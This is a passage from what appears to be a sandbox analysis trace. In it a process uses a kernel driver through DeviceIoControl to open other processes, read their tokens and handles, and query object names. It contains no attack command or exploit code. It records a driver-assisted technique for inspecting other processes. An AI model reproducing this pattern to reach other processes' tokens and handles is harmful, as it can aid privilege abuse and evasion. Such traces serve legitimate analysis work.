DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800005bc) returned 0x0 [0226.181] ObfDereferenceObject (Object=0xfffffa8001f99b30) returned 0x14 [0226.181] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800005bc, DesiredAccess=0x8, TokenHandle=0xfffffa8001f3f400 | out: TokenHandle=0xfffffa8001f3f400*=0xc4) returned 0x0 [0226.181] ZwClose (Handle=0xffffffff800005bc) returned 0x0 [0226.181] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.181] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.181] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.183] CloseHandle (hObject=0xc4) returned 1 [0226.183] CloseHandle (hObject=0xc8) returned 1 [0226.183] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.183] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.183] PsLookupProcessByProcessId (in: ProcessId=0x734, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.183] PsAcquireProcessExitSynchronization () returned 0x0 [0226.183] KeStackAttachProcess (in: PROCESS=0xfffffa8001f99b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f99b30, ApcState=0xfffff880052b35d0) [0226.184] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f6c6e0, HandleInformation=0x0) returned 0x0 [0226.184] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.184] PsReleaseProcessExitSynchronization () returned 0x2 [0226.184] ObfDereferenceObject (Object=0xfffffa8001f99b30) returned 0x12 [0226.184] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.184] ObfDereferenceObject (Object=0xfffffa8001f6c6e0) returned 0x1 [0226.184] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.184] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.184] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.184] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0226.184] PsLookupProcessByProcessId (in: ProcessId=0x734, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.184] PsAcquireProcessExitSynchronization () returned 0x0 [0226.184] KeStackAttachProcess (in: PROCESS=0xfffffa8001f99b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f99b30, ApcState=0xfffff880052b35d0) [0226.184] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f6cf20, HandleInformation=0x0) returned 0x0 [0226.184] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.184] PsReleaseProcessExitSynchronization () returned 0x2 [0226.184] ObfDereferenceObject (Object=0xfffffa8001f99b30) returned 0x12 [0226.185] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.185] ObfDereferenceObject (Object=0xfffffa8001f6cf20) returned 0x1 [0226.185] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.185] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.185] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.185] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.185] PsLookupProcessByProcessId (in: ProcessId=0x734, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.185] PsAcquireProcessExitSynchronization () returned 0x0 [0226.185] KeStackAttachProcess (in: PROCESS=0xfffffa8001f99b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f99b30, ApcState=0xfffff880052b35d0) [0226.185] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.185] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.185] PsReleaseProcessExitSynchronization () returned 0x2 [0226.185] ObfDereferenceObject (Object=0xfffffa8001f99b30) returned 0x12 [0226.185] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.185] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x54 [0226.185] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.185] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xc8 [0226.185] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.186] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa800ea389f0, HandleInformation=0x0) returned 0x0 [0226.186] ObOpenObjectByPointer (in: Object=0xfffffa800ea389f0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800005bc) returned 0x0 [0226.186] ObfDereferenceObject (Object=0xfffffa800ea389f0) returned 0x14 [0226.186] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800005bc, DesiredAccess=0x8, TokenHandle=0xfffffa8001f3f400 | out: TokenHandle=0xfffffa8001f3f400*=0xc4) returned 0x0 [0226.186] ZwClose (Handle=0xffffffff800005bc) returned 0x0 [0226.186] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.186] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.186] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.188] CloseHandle (hObject=0xc4) returned 1 [0226.188] CloseHandle (hObject=0xc8) returned 1 [0226.188] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.188] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.188] PsLookupProcessByProcessId (in: ProcessId=0x688, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.188] PsAcquireProcessExitSynchronization () returned 0x0 [0226.188] KeStackAttachProcess (in: PROCESS=0xfffffa800ea389f0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800ea389f0, ApcState=0xfffff880052b35d0) [0226.188] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a199a0, HandleInformation=0x0) returned 0x0 [0226.188] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.188] PsReleaseProcessExitSynchronization () returned 0x2 [0226.188] ObfDereferenceObject (Object=0xfffffa800ea389f0) returned 0x12 [0226.189] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.189] ObfDereferenceObject (Object=0xfffffa8003a199a0) returned 0x1 [0226.189] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.189] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.189] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.189] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0226.189] PsLookupProcessByProcessId (in: ProcessId=0x688, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.189] PsAcquireProcessExitSynchronization () returned 0x0 [0226.189] KeStackAttachProcess (in: PROCESS=0xfffffa800ea389f0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800ea389f0, ApcState=0xfffff880052b35d0) [0226.189] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003914330, HandleInformation=0x0) returned 0x0 [0226.189] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.189] PsReleaseProcessExitSynchronization () returned 0x2 [0226.189] ObfDereferenceObject (Object=0xfffffa800ea389f0) returned 0x12 [0226.189] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.189] ObfDereferenceObject (Object=0xfffffa8003914330) returned 0x1 [0226.189] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.190] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.190] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.190] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.190] PsLookupProcessByProcessId (in: ProcessId=0x688, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.190] PsAcquireProcessExitSynchronization () returned 0x0 [0226.190] KeStackAttachProcess (in: PROCESS=0xfffffa800ea389f0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800ea389f0, ApcState=0xfffff880052b35d0) [0226.190] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.190] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.190] PsReleaseProcessExitSynchronization () returned 0x2 [0226.190] ObfDereferenceObject (Object=0xfffffa800ea389f0) returned 0x12 [0226.190] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.190] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x54 [0226.190] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.190] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x414) returned 0xc8 [0226.190] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.190] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001f52310, HandleInformation=0x0) returned 0x0 [0226.190] ObOpenObjectByPointer (in: Object=0xfffffa8001f52310, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800005bc) returned 0x0 [0226.190] ObfDereferenceObject (Object=0xfffffa8001f52310) returned 0x14 [0226.190] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800005bc, DesiredAccess=0x8, TokenHandle=0xfffffa8001f3f400 | out: TokenHandle=0xfffffa8001f3f400*=0xc4) returned 0x0 [0226.191] ZwClose (Handle=0xffffffff800005bc) returned 0x0 [0226.191] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.191] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.191] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.366] CloseHandle (hObject=0xc4) returned 1 [0226.366] CloseHandle (hObject=0xc8) returned 1 [0226.366] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.366] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.366] PsLookupProcessByProcessId (in: ProcessId=0x414, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.366] PsAcquireProcessExitSynchronization () returned 0x0 [0226.366] KeStackAttachProcess (in: PROCESS=0xfffffa8001f52310, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f52310, ApcState=0xfffff880052b35d0) [0226.366] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8010db15d0, HandleInformation=0x0) returned 0x0 [0226.366] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.366] PsReleaseProcessExitSynchronization () returned 0x2 [0226.367] ObfDereferenceObject (Object=0xfffffa8001f52310) returned 0x12 [0226.367] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.367] ObfDereferenceObject (Object=0xfffffa8010db15d0) returned 0x1 [0226.367] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.367] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.367] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.367] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0226.367] PsLookupProcessByProcessId (in: ProcessId=0x414, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.367] PsAcquireProcessExitSynchronization () returned 0x0 [0226.367] KeStackAttachProcess (in: PROCESS=0xfffffa8001f52310, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f52310, ApcState=0xfffff880052b35d0) [0226.367] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8010b054b0, HandleInformation=0x0) returned 0x0 [0226.367] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.367] PsReleaseProcessExitSynchronization () returned 0x2 [0226.367] ObfDereferenceObject (Object=0xfffffa8001f52310) returned 0x12 [0226.367] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.367] ObfDereferenceObject (Object=0xfffffa8010b054b0) returned 0x1 [0226.367] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.367] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.367] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.367] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.367] PsLookupProcessByProcessId (in: ProcessId=0x414, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.368] PsAcquireProcessExitSynchronization () returned 0x0 [0226.368] KeStackAttachProcess (in: PROCESS=0xfffffa8001f52310, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f52310, ApcState=0xfffff880052b35d0) [0226.368] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.368] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.368] PsReleaseProcessExitSynchronization () returned 0x2 [0226.368] ObfDereferenceObject (Object=0xfffffa8001f52310) returned 0x12 [0226.368] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.368] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.368] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.368] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x90) returned 0xc8 [0226.368] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.368] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001f6c060, HandleInformation=0x0) returned 0x0 [0226.368] ObOpenObjectByPointer (in: Object=0xfffffa8001f6c060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0226.368] ObfDereferenceObject (Object=0xfffffa8001f6c060) returned 0x14 [0226.368] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.368] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0226.368] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.369] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.369] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.371] CloseHandle (hObject=0xc4) returned 1 [0226.371] CloseHandle (hObject=0xc8) returned 1 [0226.371] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.371] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.371] PsLookupProcessByProcessId (in: ProcessId=0x90, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.371] PsAcquireProcessExitSynchronization () returned 0x0 [0226.371] KeStackAttachProcess (in: PROCESS=0xfffffa8001f6c060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f6c060, ApcState=0xfffff880052b35d0) [0226.371] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800adfd7a0, HandleInformation=0x0) returned 0x0 [0226.371] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.371] PsReleaseProcessExitSynchronization () returned 0x2 [0226.371] ObfDereferenceObject (Object=0xfffffa8001f6c060) returned 0x12 [0226.371] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.371] ObfDereferenceObject (Object=0xfffffa800adfd7a0) returned 0x1 [0226.371] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.372] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.372] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.372] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0226.372] PsLookupProcessByProcessId (in: ProcessId=0x90, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.372] PsAcquireProcessExitSynchronization () returned 0x0 [0226.372] KeStackAttachProcess (in: PROCESS=0xfffffa8001f6c060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f6c060, ApcState=0xfffff880052b35d0) [0226.372] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800dbf7df0, HandleInformation=0x0) returned 0x0 [0226.372] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.372] PsReleaseProcessExitSynchronization 